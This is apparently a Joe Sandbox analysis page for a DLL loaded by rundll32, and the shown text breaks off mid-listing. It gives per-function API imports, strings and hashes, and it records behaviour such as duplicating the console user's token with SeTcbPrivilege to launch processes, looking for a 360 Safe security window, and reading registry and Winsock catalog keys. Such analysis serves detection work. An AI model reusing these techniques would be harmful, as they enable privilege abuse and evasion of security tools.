Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressProc$Modulememset$CombineFileFreeHandleLibraryNamePath
String ID: ..\ipc\x64for32lib.dll$EnumProcessModules64$GetCommandLine64$GetCurrentDirectory64$GetModuleBaseNameW64$GetModuleFileNameExW64$GetModuleInformation64$IsProcessWow64Process$NtQueryInformationProcess64$NtQueryInformationThread64$ReadProcessMemory64
API String ID: 3359005274-2277939915
Opcode ID: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
Instruction ID: 36480451210aca2b5e6fe81c352119384c097133635e903ecd0715684d47c6ca
Opcode Fuzzy Hash: 11406f1aeae7bd1ca1e9419c163a9dd1d65d254f22157801c59e7a4b8def0cf2
Instruction Fuzzy Hash: 2D512532201F5AA2EEA58F51E99439833A5FB4C7C0F549525EA5907A60DF38D3B9C710

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002B2EC Relevance: 42.4, APIs: 22, Strings: 2, Instructions: 383fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 000000018002B354
GetFileSizeEx.KERNEL32 ref: 000000018002B36D
??_U@YAPEAX_K@Z.MSVCRT ref: 000000018002B395
ReadFile.KERNEL32 ref: 000000018002B3B4
??_V@YAXPEAX@Z.MSVCRT ref: 000000018002B3C3
CloseHandle.KERNEL32 ref: 000000018002B3CC
??_U@YAPEAX_K@Z.MSVCRT ref: 000000018002B403
memmove.MSVCRT ref: 000000018002B415
StrStrIW.SHLWAPI ref: 000000018002B434
StrStrIA.SHLWAPI ref: 000000018002B4D5
??_U@YAPEAX_K@Z.MSVCRT ref: 000000018002B656
MultiByteToWideChar.KERNEL32 ref: 000000018002B678
StrStrIW.SHLWAPI ref: 000000018002B68C
??_V@YAXPEAX@Z.MSVCRT ref: 000000018002B6C4
memmove.MSVCRT ref: 000000018002B72E
StrStrIA.SHLWAPI ref: 000000018002B73D
memmove.MSVCRT ref: 000000018002B77D
StrStrIW.SHLWAPI ref: 000000018002B78C
memmove.MSVCRT ref: 000000018002B7CC
StrStrIW.SHLWAPI ref: 000000018002B811

Part of subcall function 0000000180031364: StrStrIW.SHLWAPI ref: 0000000180031395
Part of subcall function 0000000180031364: _wcsicmp.MSVCRT ref: 0000000180031431
Part of subcall function 0000000180031364: StrStrIW.SHLWAPI ref: 0000000180031647

Part of subcall function 000000018003168C: StrStrIW.SHLWAPI ref: 00000001800316B6

??_V@YAXPEAX@Z.MSVCRT ref: 000000018002B849
CloseHandle.KERNEL32 ref: 000000018002B857

Strings

<script, xrefs: 000000018002B4CE, 000000018002B733
<script, xrefs: 000000018002B42A, 000000018002B682, 000000018002B782, 000000018002B807

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memmove$File$CloseHandle$ByteCharCreateMultiReadSizeWide_wcsicmp
String ID: <script$<script
API String ID: 3854916350-2095320664
Opcode ID: aabe63095d4014b66694cbd9da80869a4679e39a58ece0fe403894298f6a2f9d
Instruction ID: f153a338753de2324ddff23d5d348aafdead37974da18f2bc7ac3ae69100bf45
Opcode Fuzzy Hash: aabe63095d4014b66694cbd9da80869a4679e39a58ece0fe403894298f6a2f9d
Instruction Fuzzy Hash: 4CE1C07120068986EA9BDF1698943F977A1FB49BC0F84C116FA5A47B91DF38CB4ED304

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004B1A4 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 223processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018004B226
GetCurrentProcess.KERNEL32 ref: 000000018004B22C
OpenProcessToken.ADVAPI32 ref: 000000018004B23F
LookupPrivilegeValueW.ADVAPI32 ref: 000000018004B264
AdjustTokenPrivileges.ADVAPI32 ref: 000000018004B2E0
GetLastError.KERNEL32 ref: 000000018004B2F4
WTSGetActiveConsoleSessionId.KERNEL32 ref: 000000018004B30E
WTSQueryUserToken.WTSAPI32 ref: 000000018004B330
GetTokenInformation.ADVAPI32 ref: 000000018004B3AC
DuplicateTokenEx.ADVAPI32 ref: 000000018004B3EA
CreateEnvironmentBlock.USERENV ref: 000000018004B44C
CreateProcessAsUserW.ADVAPI32 ref: 000000018004B4BD

Part of subcall function 00000001800669B4: GetTokenInformation.ADVAPI32 ref: 00000001800669F1
Part of subcall function 00000001800669B4: GetTokenInformation.ADVAPI32 ref: 0000000180066A25

GetLastError.KERNEL32 ref: 000000018004B4D5
DestroyEnvironmentBlock.USERENV ref: 000000018004B4F3
CloseHandle.KERNEL32 ref: 000000018004B505
CloseHandle.KERNEL32 ref: 000000018004B515
AdjustTokenPrivileges.ADVAPI32 ref: 000000018004B541
CloseHandle.KERNEL32 ref: 000000018004B54E

Strings

SeTcbPrivilege, xrefs: 000000018004B25B
h, xrefs: 000000018004B40C
winsta0\default, xrefs: 000000018004B400

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Token$CloseHandleInformationProcess$AdjustBlockCreateEnvironmentErrorLastPrivilegesUser$ActiveConsoleCurrentDestroyDuplicateLookupOpenPrivilegeQuerySessionValuememset
String ID: SeTcbPrivilege$h$winsta0\default
API String ID: 2730501308-2823425829
Opcode ID: da626f246ce0b3925ee1fe27a827f12215fb960ca2972f5f4b6fa681b72b113d
Instruction ID: 63acb98c3057d7eee2a2f85741aa180b658631cb3bbab8e9928767d1695d7121
Opcode Fuzzy Hash: da626f246ce0b3925ee1fe27a827f12215fb960ca2972f5f4b6fa681b72b113d
Instruction Fuzzy Hash: A4A11072608B8486E7A1CF65F8507DAB7E4F7CC794F518125EA8983B68DF38C649CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180049278 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32 ref: 00000001800492C4
LookupPrivilegeValueW.ADVAPI32 ref: 00000001800492D7
LookupPrivilegeValueW.ADVAPI32 ref: 00000001800492EA
LookupPrivilegeValueW.ADVAPI32 ref: 00000001800492FD
??_U@YAPEAX_K@Z.MSVCRT ref: 0000000180049306
GetCurrentProcess.KERNEL32 ref: 0000000180049341
OpenProcessToken.ADVAPI32 ref: 0000000180049353
CreateRestrictedToken.ADVAPI32 ref: 000000018004938D
CloseHandle.KERNEL32 ref: 000000018004939B
CloseHandle.KERNEL32 ref: 00000001800493A3
AllocateAndInitializeSid.ADVAPI32 ref: 00000001800493E6
GetLengthSid.ADVAPI32 ref: 0000000180049400
SetTokenInformation.ADVAPI32 ref: 0000000180049417
FreeSid.ADVAPI32 ref: 0000000180049421
AdjustTokenPrivileges.ADVAPI32 ref: 0000000180049440
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180049449

Strings

SeIncreaseWorkingSetPrivilege, xrefs: 00000001800492E3
SeUndockPrivilege, xrefs: 00000001800492F6
SeTimeZonePrivilege, xrefs: 00000001800492D0
SeShutdownPrivilege, xrefs: 00000001800492A3

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: LookupPrivilegeTokenValue$CloseHandleProcess$AdjustAllocateCreateCurrentFreeInformationInitializeLengthOpenPrivilegesRestricted
String ID: SeIncreaseWorkingSetPrivilege$SeShutdownPrivilege$SeTimeZonePrivilege$SeUndockPrivilege
API String ID: 51528658-3108072533
Opcode ID: e33c9bce59f9407c2e2ff38a6d92360040c7285e03c52f3c2110e53bb262eff8
Instruction ID: e90fc643d0e92dc4c713161bffc3fffdb9ad8c0d1725e2c558d965ce0668d002
Opcode Fuzzy Hash: e33c9bce59f9407c2e2ff38a6d92360040c7285e03c52f3c2110e53bb262eff8
Instruction Fuzzy Hash: 5E511972604B45DAE791CF61E8807DDB7B4F788B88F41811AEA5A47B68CF38C319CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180026C84 Relevance: 33.8, APIs: 12, Strings: 7, Instructions: 559COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180026D15
_wcsicmp.MSVCRT ref: 0000000180026D86
_wcsicmp.MSVCRT ref: 0000000180026D9B

Part of subcall function 0000000180020588: _wcsicmp.MSVCRT ref: 00000001800205DE

??3@YAXPEAX@Z.MSVCRT ref: 00000001800274FE

Strings

\OpenWithList, xrefs: 0000000180026EC0
\OpenWithProgids, xrefs: 0000000180026EAC
Progid, xrefs: 0000000180026F23, 0000000180026F8B
Applications\, xrefs: 0000000180027067
Applications/, xrefs: 000000018002707D
\UserChoice, xrefs: 0000000180026EE5
Application, xrefs: 0000000180026FF0, 00000001800270C9

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _wcsicmp$??3@memset
String ID: Application$Applications/$Applications\$Progid$\OpenWithList$\OpenWithProgids$\UserChoice
API String ID: 3035816649-3026584011
Opcode ID: c3856a03b375e45892a4d72ef0243309f0eef955c225044f7e3de6569f4e6054
Instruction ID: 8735dd277f86c71873612ff2c024f3d2b305f3a14da21f48fef006481f506be5
Opcode Fuzzy Hash: c3856a03b375e45892a4d72ef0243309f0eef955c225044f7e3de6569f4e6054
Instruction Fuzzy Hash: 19429172700A4982EBA2DF65D8407DD77A1F789BE8F408212EE5D57BA9DF38C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002610 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 416registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180002691
memset.MSVCRT ref: 00000001800026A3
memset.MSVCRT ref: 00000001800026C1
memset.MSVCRT ref: 000000018000275C
memset.MSVCRT ref: 0000000180002771
RegOpenKeyExW.ADVAPI32 ref: 0000000180002824
RegEnumKeyW.ADVAPI32 ref: 000000018000286C
RegOpenKeyExW.ADVAPI32 ref: 0000000180002964
free.MSVCRT ref: 0000000180002A97
RegCloseKey.ADVAPI32 ref: 0000000180002AD2
RegCloseKey.ADVAPI32 ref: 0000000180002AFB
RegCloseKey.ADVAPI32 ref: 0000000180002D4B

Strings

\Features\, xrefs: 000000018000290E
HKEY_LOCAL_MACHINE\, xrefs: 0000000180002CA7
\Components\, xrefs: 0000000180002BB2
\Products\, xrefs: 00000001800028DF

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memset$Close$Open$Enumfree
String ID: HKEY_LOCAL_MACHINE\$\Components\$\Features\$\Products\
API String ID: 1285027818-2258373985
Opcode ID: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
Instruction ID: 6311c4a4e92b2eb2b6e61e2371f742115398930d0f6aaa53fdf69de799299566
Opcode Fuzzy Hash: 9906bf7cd91924df8938282da413fefd9331e0d97fbadb0acae730663cf89f7c
Instruction Fuzzy Hash: 9C126F72218AC891FAB2EB55E8453DAB365FB897C4F448111FA8E43A99DF3DC749C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800097E0 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 326libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 0000000180009832
LoadLibraryExW.KERNEL32 ref: 000000018000984E
FindResourceW.KERNEL32 ref: 0000000180009876
LoadResource.KERNEL32 ref: 0000000180009894
SizeofResource.KERNEL32 ref: 00000001800098AD
FreeLibrary.KERNEL32 ref: 000000018000996F
memset.MSVCRT ref: 0000000180009A37
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000000180009A47
GetLastError.KERNEL32 ref: 0000000180009A51
GetModuleFileNameW.KERNEL32 ref: 0000000180009AD3

Part of subcall function 0000000180007C0C: GetLastError.KERNEL32(?,?,?,?,000000018000745D), ref: 0000000180007C10

Part of subcall function 0000000180007B38: EnterCriticalSection.KERNEL32 ref: 0000000180007B6B
Part of subcall function 0000000180007B38: LeaveCriticalSection.KERNEL32 ref: 0000000180007B8C

GetModuleHandleW.KERNEL32 ref: 0000000180009B43
memmove.MSVCRT ref: 0000000180009BA3
_errno.MSVCRT ref: 0000000180009C4D

Strings

Module_Raw, xrefs: 0000000180009C04
APPID, xrefs: 0000000180009A9C
REGISTRY, xrefs: 00000001800099C2, 00000001800099C4, 0000000180009C7A, 0000000180009CA2
Module, xrefs: 0000000180009BE8

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalLibraryLoadResourceSection$ErrorLastModule$CountEnterFileFindFreeHandleInitializeLeaveNameSizeofSpin_errnomemmovememset
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 1685702935-2529269209
Opcode ID: 3ceff26221d8725232ae8591cbe8c72322095ba2c2c9e72f7b8b6d0864ba4b02
Instruction ID: 1170741c672b2f4bc32c1c4dc3a7fce7b8275b676f47fdb2797edeea2ade6d42
Opcode Fuzzy Hash: 3ceff26221d8725232ae8591cbe8c72322095ba2c2c9e72f7b8b6d0864ba4b02
Instruction Fuzzy Hash: 29D18132705B8886FBA2DBA5E8403DA73A0F7897D4F509125BA5D47BA5EF38C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004E5DC Relevance: 30.3, APIs: 15, Strings: 2, Instructions: 545registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

EnterCriticalSection.KERNEL32 ref: 000000018004E72F
LeaveCriticalSection.KERNEL32 ref: 000000018004E77C
EnterCriticalSection.KERNEL32 ref: 000000018004E7A6
LeaveCriticalSection.KERNEL32 ref: 000000018004E7F3
wcsstr.MSVCRT ref: 000000018004E83B
RegOpenKeyExW.ADVAPI32 ref: 000000018004E8CA
RegQueryInfoKeyW.ADVAPI32 ref: 000000018004E961

Strings

%s\NameSpace_Catalog5\Catalog_Entries\%012d, xrefs: 000000018004E6CB
%s\%s, xrefs: 000000018004EC88

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterLeave$HeapInfoOpenProcessQuerywcsstr
String ID: %s\%s$%s\NameSpace_Catalog5\Catalog_Entries\%012d
API String ID: 3416916155-2281247154
Opcode ID: 851d72f758c609aaf0f7580462004af6cc936b62e1bcf46d8cf7636727f3a395
Instruction ID: ff7a32f2b868f52803f629acb27a054862175391eb200bc512a22fc71bba3e47
Opcode Fuzzy Hash: 851d72f758c609aaf0f7580462004af6cc936b62e1bcf46d8cf7636727f3a395
Instruction Fuzzy Hash: A332AE72700B8886EB92DF64E8803DD33A0F74A7D8F10852AEA5D477A5DF38C699C704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180060578 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 289registrywindowtimeCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 000000018006062B
FindWindowW.USER32 ref: 000000018006067B
IsWindow.USER32 ref: 0000000180060690
memset.MSVCRT ref: 00000001800606C2
SendMessageTimeoutW.USER32 ref: 0000000180060722
SendMessageTimeoutW.USER32 ref: 0000000180060767
RegOpenKeyExW.ADVAPI32 ref: 00000001800607BF
memset.MSVCRT ref: 00000001800607DE
RegQueryValueExW.ADVAPI32 ref: 0000000180060825
memset.MSVCRT ref: 00000001800608E0
RegQueryValueExW.ADVAPI32 ref: 0000000180060918

Part of subcall function 0000000180016DD4: memmove.MSVCRT(?,?,?,?,?,?,?,0000000180016E29), ref: 0000000180016E10

RegCloseKey.ADVAPI32 ref: 00000001800609B9

Strings

activeapp, xrefs: 0000000180060819
activeweb, xrefs: 000000018006090C
Q360SafeMonClass, xrefs: 0000000180060674
MsgCenter, xrefs: 000000018006078E
TS2P, xrefs: 0000000180060713

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Windowmemset$MessageQuerySendTimeoutValue$CloseFindForegroundOpenmemmove
String ID: MsgCenter$Q360SafeMonClass$TS2P$activeapp$activeweb
API String ID: 3772276521-2728888700
Opcode ID: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
Instruction ID: ee8cae4e48a5beadbc07239537d79e19b069e47090ef93ff609d4821bf219365
Opcode Fuzzy Hash: 252ce8677bfb522a4b6632ad157aa9371a8792e99c65b85e20036a72b1270932
Instruction Fuzzy Hash: C1D19172604B4886EB51DF25E8403DE7761F789BE8F608215EAAD43BE5DF38C649CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005958C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 169registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180059644
RegOpenKeyExW.ADVAPI32 ref: 000000018005967A
memset.MSVCRT ref: 000000018005969B
RegEnumKeyExW.ADVAPI32 ref: 00000001800596DB
RegOpenKeyExW.ADVAPI32 ref: 0000000180059706
RegQueryValueExW.ADVAPI32 ref: 0000000180059742
_wcsicmp.MSVCRT ref: 0000000180059758
RegOpenKeyExW.ADVAPI32 ref: 0000000180059785
memset.MSVCRT ref: 00000001800597A2
RegQueryValueExW.ADVAPI32 ref: 00000001800597D7
memmove.MSVCRT ref: 000000018005981B
RegCloseKey.ADVAPI32 ref: 000000018005982A
RegCloseKey.ADVAPI32 ref: 0000000180059835
RegCloseKey.ADVAPI32 ref: 000000018005984A

Part of subcall function 000000018005944C: swprintf.LEGACY_STDIO_DEFINITIONS ref: 0000000180059556
Part of subcall function 000000018005944C: _wcsicmp.MSVCRT ref: 0000000180059563

Strings

Driver, xrefs: 0000000180059723
Device Parameters, xrefs: 000000018005977E
EDID, xrefs: 00000001800597B6

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CloseOpenmemset$QueryValue_wcsicmp$Enummemmoveswprintf
String ID: Device Parameters$Driver$EDID
API String ID: 3978137082-2299925461
Opcode ID: b95cd2e3d8507b9a87a60e61deae70fe2a7455a91287d77eb7c845bd1ab5848f
Instruction ID: 9305dd9bcaed70cdf0d37fe600fca7c095d3f7e64be226b027989fd01a2a7e0b
Opcode Fuzzy Hash: b95cd2e3d8507b9a87a60e61deae70fe2a7455a91287d77eb7c845bd1ab5848f
Instruction Fuzzy Hash: E481A632615A8886EBA2CF65E8407DAB3A0FB897C4F048115FE8C57665EF39C74DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004638 Relevance: 29.4, APIs: 19, Instructions: 914COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000001800066E5
GetLastError.KERNEL32 ref: 00000001800066EF

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CountCriticalErrorInitializeLastSectionSpin
String ID:
API String ID: 439134102-0
Opcode ID: a46c37f9d43addc7902de8a620b67c5d7e9bf97180802cf92c4b38db29028bd0
Instruction ID: 174b29e8cd160b97723a189948c8d9aaf29f8d7efdb631c6e245ba98a82576f0
Opcode Fuzzy Hash: a46c37f9d43addc7902de8a620b67c5d7e9bf97180802cf92c4b38db29028bd0
Instruction Fuzzy Hash: 21826D76604B4982FB96CB29E8403DA33A1F789BE4F15C125EE5D477A4EF38CA49C350

Uniqueness

Uniqueness Score: -1.00%

Function 000000018007E7C7 Relevance: 28.7, APIs: 16, Strings: 3, Instructions: 248COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 000000018007EB4B
free.MSVCRT ref: 000000018007EB57
free.MSVCRT ref: 000000018007EB62
memset.MSVCRT ref: 000000018007EBC2
calloc.MSVCRT ref: 000000018007EC04
free.MSVCRT ref: 000000018007EC10
free.MSVCRT ref: 000000018007EC1B
calloc.MSVCRT ref: 000000018007ECB8
free.MSVCRT ref: 000000018007ECC4
free.MSVCRT ref: 000000018007ECCF
calloc.MSVCRT ref: 000000018007ED0B
free.MSVCRT ref: 000000018007ED17
free.MSVCRT ref: 000000018007ED22
calloc.MSVCRT ref: 000000018007EDC9
free.MSVCRT ref: 000000018007EDD5
free.MSVCRT ref: 000000018007EDE0

Strings

-, xrefs: 000000018007EC59
], xrefs: 000000018007EC39
], xrefs: 000000018007ED55

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: free$calloc$memset
String ID: -$]$]
API String ID: 2591755499-1349866957
Opcode ID: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
Instruction ID: 1d85a50f400dc416e5d0a718f77556582d5ce19bdf984b68484f18af02043cc0
Opcode Fuzzy Hash: 2679cd0fb79ab9e79cb7ec4cb87940f65e1566cfba3dc15da5d319deb0b258b9
Instruction Fuzzy Hash: BCA1D272706BC892EB96CB16D0403A977A1F74D780F449616EB8A17B81DF39D2B9D300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005D014 Relevance: 28.4, APIs: 8, Strings: 8, Instructions: 422timesynchronizationCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 000000018005D0CB
SystemTimeToFileTime.KERNEL32 ref: 000000018005D0D9
??3@YAXPEAX@Z.MSVCRT ref: 000000018005D46D
free.MSVCRT ref: 000000018005D489
??3@YAXPEAX@Z.MSVCRT ref: 000000018005D597
free.MSVCRT ref: 000000018005D5B3
free.MSVCRT ref: 000000018005D5CB
ReleaseMutex.KERNEL32 ref: 000000018005D600

Strings

INSERT INTO "MT" VALUES ( ?,?,?,?,?,?,?,?,?,?,?,?,NULL ) , xrefs: 000000018005D09E
AND , xrefs: 000000018005D73B
SLEV = %d , xrefs: 000000018005D7BB
TimeStamp < %I64d;, xrefs: 000000018005D846
ModName LIKE ', xrefs: 000000018005D6E2
WHERE , xrefs: 000000018005D944
TYPE = %d, xrefs: 000000018005D76E
DELETE FROM 'MT' , xrefs: 000000018005D909

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
